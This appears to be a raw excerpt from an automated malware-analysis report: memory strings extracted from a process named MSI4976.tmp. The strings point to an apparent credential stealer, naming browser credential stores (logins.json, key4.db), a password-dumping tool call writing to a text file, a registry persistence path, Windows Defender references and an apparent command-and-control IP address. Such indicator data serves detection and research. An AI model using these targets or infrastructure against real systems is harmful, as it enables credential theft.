              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2su2us0ge9q[omemstr_27eefcc1-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o2yu7az0kbomemstr_fcac0128-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o0be5cm0eh0beo*\memstr_c793d36a-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5ty9jp2nmemstr_ac7248f5-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p4lb9fu2rwo$\memstr_6a60fbc4-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ioctlsocket~o?\memstr_b940c8ba-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p4sb7hf1nc5hmemstr_13e72e0f-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g8dv0vm4qmemstr_4ba4574d-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2gj2we1lmemstr_f89a6283-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2vx8ix2xr2hmemstr_47d2516c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n1vg3zx7vmemstr_25e89606-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3ky0mn2u$omemstr_90e52907-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p7kz5ud7i/ol\memstr_5a310172-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3wm6ww5qu9n6og\memstr_0adf88a1-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin2.exe /stext pl2.9o~\memstr_5d0bd326-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \key4.dbmemstr_a9e5e5e2-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r3ju1fa3wm/chememstr_790ac0f0-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n9jz4pp2nmemstr_bb050f23-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o8tq9mx1gq4umemstr_0f0403b2-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p6yv9rm2nm6dmemstr_6c5683d7-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f7bp2gd7num2wp0un5amemstr_01e7a59c-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: firefox.exememstr_fe3e4503-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8rs7jf2ir3qmemstr_b2b39c7e-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrome.exememstr_20e85e91-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /pl2.txtmemstr_b9e8d974-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p7cx1zr8wbjmemstr_2b237ee9-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3pk3zx6hrofilmemstr_b315b82d-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \cert9.dbmemstr_c294d925-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n8lv2tx6yu1nemmemstr_a84369c7-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p9hc9is9kmemstr_12139ba1-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p1rh2zd8vk5hmemstr_a70aae9a-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2uy0cr1wmemstr_04752362-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2sc6qp6ymemstr_6208c397-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p3hc4op4vmemstr_92b7edc9-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8sg3ru5zmemstr_6696a59e-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g2zt0rm5jlhmemstr_2cb29827-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e8ea1ym8wwhmemstr_e13bcbce-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\^hmemstr_fb9bbb38-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \logins.jsonmemstr_e3e9f512-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r3vc9kk7qj5whh)_memstr_002be916-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8tj3rn0wr5smemstr_6be7bfc3-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmplayer.exe3quran.netzh;_memstr_536e4e22-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /vyzspq.lnk}h2_memstr_236e41b8-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g5xu5ii6pmemstr_aa492c6c-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e9rx3fn9mf7xmemstr_30fc46a7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin1.exememstr_fc8ceee4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e7zl6et4ph2lmemstr_1525f5ec-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4vf3zs1q+hh_memstr_253c652d-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e6xd9xr7g2hc_memstr_ef0cdc80-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b0yo7wp3e5hz_memstr_d8c77fa4-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows defender<h}_memstr_73d01560-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemdefaultpathparsermemstr_d35b6809-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p9mn3jt5imemstr_b85fa22e-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p0bt9nb0kf8dmemstr_66984b5c-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 172.111.138.100vcmemstr_17b5ea75-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6vs6pg1qmemstr_1a4200be-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "swbemprivilegesetr2memstr_b92b58ed-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p3zz8xp9ic6apcmemstr_de7fa50a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5cy6rz5vmemstr_ceb1e51a-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swbemservicesexr2omemstr_f298666c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b5ok6ax1pw1iaimemstr_341c0348-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r4xi9ox1thimemstr_43ee2000-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o7ke1sa7gd6csimemstr_af347cf7-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o3tc9tk3wzimemstr_69023f2e-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemdefaultpathparserdimemstr_9eb5c1cd-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32memstr_36691b99-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1gl3mf7acyi>^memstr_bca90064-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2nt5si4ld0amemstr_4205051c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installer\msi4976.tmpmemstr_97dbeeee-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installer\msi4976.tmp1if^memstr_ae4f90db-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lmem memstr_c8123407-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: negoextenderlmem memstr_f97083f6-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m5bz1jb5rh8mmemstr_05b26b57-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localappdata=c:\users\user\appdata\localmemstr_43916aee-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9umemstr_3c6f1ea1-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles(x86)=c:\program files (x86)memstr_57e3d383-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9u|memstr_f958b543-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p0wl6gm6fmemstr_01284d01-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows defendermemstr_9225ba8f-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1tq0ev4xw2smemstr_f612462a-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles(x86)=c:\program files (x86)djmemstr_a32fad4d-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|vjmemstr_aacfdc43-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n6nx9ci0myjmemstr_b37e6580-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kj(q#memstr_4e7c5dcc-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\musicrj#q$memstr_25039dfb-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uj:q%memstr_79c94547-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |j=q&memstr_ccfc92e5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *jkq,memstr_3a73c015-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videos-jbq-memstr_809daab6-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hj(5w<memstr_1810355f-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4jeq.memstr_b47689e1-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?j|q/memstr_c0804c29-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\desktopmemstr_5e81f4a0-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8amemstr_e3e91a88-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\desktop.inimemstr_1f1c286b-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\picturesmemstr_1e2086ed-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3gj2cn5ri5d25memstr_b3d359a6-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloadsmemstr_811aa568-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documentsmemstr_cdcdc5f0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: known folder managermemstr_1ee3b08e-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_709bc387-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfilescommonx86rkmemstr_4111b27b-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nk/phmemstr_f4c34bb0-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qk&pimemstr_eb6ee87c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xk9pjmemstr_4928578e-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrivememstr_8a99464d-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\searchesmemstr_be0bff9d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )knpqmemstr_73c29bb8-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0kaprmemstr_3ece1ed7-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ncacn_np;kxpsmemstr_79e9a449-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savedpictureslibrarymemstr_a1f0e159-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\contactsmemstr_a43eca18-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprogramfilescommonmemstr_be0ffc48-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userslibrariesfoldermemstr_4fbcd9a6-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcesdirmemstr_c19170a0-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: publicaccountpicturesmemstr_26cbc52d-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: administrative toolsmemstr_1c0524c2-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: device metadata storememstr_8626b7a0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appmodsgdmemstr_64d35046-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: searchtemplatesfolderndmemstr_24dcd694-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents.library-msqdmemstr_d1dece56-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: implicitappshortcutsjd+slmemstr_63b8a5d3-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: md"smmemstr_77c56f89-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: td%snmemstr_d17eccf1-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites"dmemstr_79d90132-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: application shortcuts%djsumemstr_a49e1432-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3xj3iu4ds,dmsvmemstr_8bbf26a3-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addnewprogramsfolder7ddswmemstr_ec52fd1b-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cameraroll.library-ms>dmemstr_2a7bdfb4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\linksmemstr_37dd0fc2-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: implicitappshortcutsmemstr_5fcc0534-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recordedtv.library-msmemstr_9b550807-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\musicmemstr_e3b6e841-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\musicjememstr_8d1a87d8-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\pictures_ememstr_5de4f363-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videosmemstr_9c009e8b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\music!ememstr_1c9c0a1a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\desktop3e`rmemstr_fe40d708-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]/qnnmemstr_b5c81a4f-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32memstr_fe9d0a3c-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)memstr_68111e05-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64memstr_6ce5e750-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)ef*umemstr_12933cbe-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\videos~f?umemstr_8a54bcfd-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j9*`+memstr_2da89a14-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <?6fgumemstr_c0cf13a4-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g5pz0qf5of4f9f~umemstr_fe07bf41-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5lt2ex3ru1jmemstr_4dbfbd6d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5rv1cb2xmemstr_1d6b3f05-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4uk9px8yb0wmemstr_beac4b0b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e6dz4iw9zh9umemstr_802d5d4b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g7gh7dz8st3ymemstr_4532bf18-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8bkeysy9u0wegmemstr_fbd638fc-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9u1ezg;tmemstr_4a0ffc5f-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2md2ql5imemstr_076c166b-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o0kq1py7ry1ememstr_ca7b6da6-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n8iw7qx8einfomemstr_36b68102-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32cmemstr_1bc62176-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32c gmemstr_53d3f911-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w7a|+ghtmemstr_f968e840-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9u|2gctmemstr_1ffa985e-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|5gztmemstr_787bef8a-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9ucmemstr_d346312d-e
